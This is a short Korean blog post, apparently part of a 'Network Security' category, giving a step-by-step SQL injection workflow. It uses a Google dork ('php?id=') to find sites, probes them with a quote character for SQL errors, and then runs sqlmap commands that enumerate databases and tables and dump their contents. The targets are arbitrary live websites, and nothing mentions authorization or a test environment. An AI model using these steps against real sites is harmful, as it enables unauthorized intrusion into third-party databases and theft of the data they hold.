View
SQLmap
1. google 에서 php?id= 으로 검색
2. 사이트 진입후 주소창 맨뒤 ' 입력후 sql 오류 문구 나오는지 확인
3. ' 를 제외한 주소 복사
4. 터미널 입력
# sqlmap -u http://xxx.xx/aa.php?id=11 --dbs
5. DB 목록 나오는지 확인
# sqlmap -u http://xxx.xx/aa.php?id=11 -D [DB명] --tables
6. Table 목록 나오는지 확인
# sqlmap -u http://xxx.xx/aa.php?id=11 -D [DB명] -T [Table명] --dump
반응형
'Network Security' 카테고리의 다른 글
| Chntpw (0) | 2016.03.30 |
|---|---|
| Ddos attack using metasploit (0) | 2016.03.29 |
| ettercap (0) | 2016.03.23 |
| URLsnarf (0) | 2016.03.23 |
| Fragrouter 설치 (0) | 2016.03.23 |
reply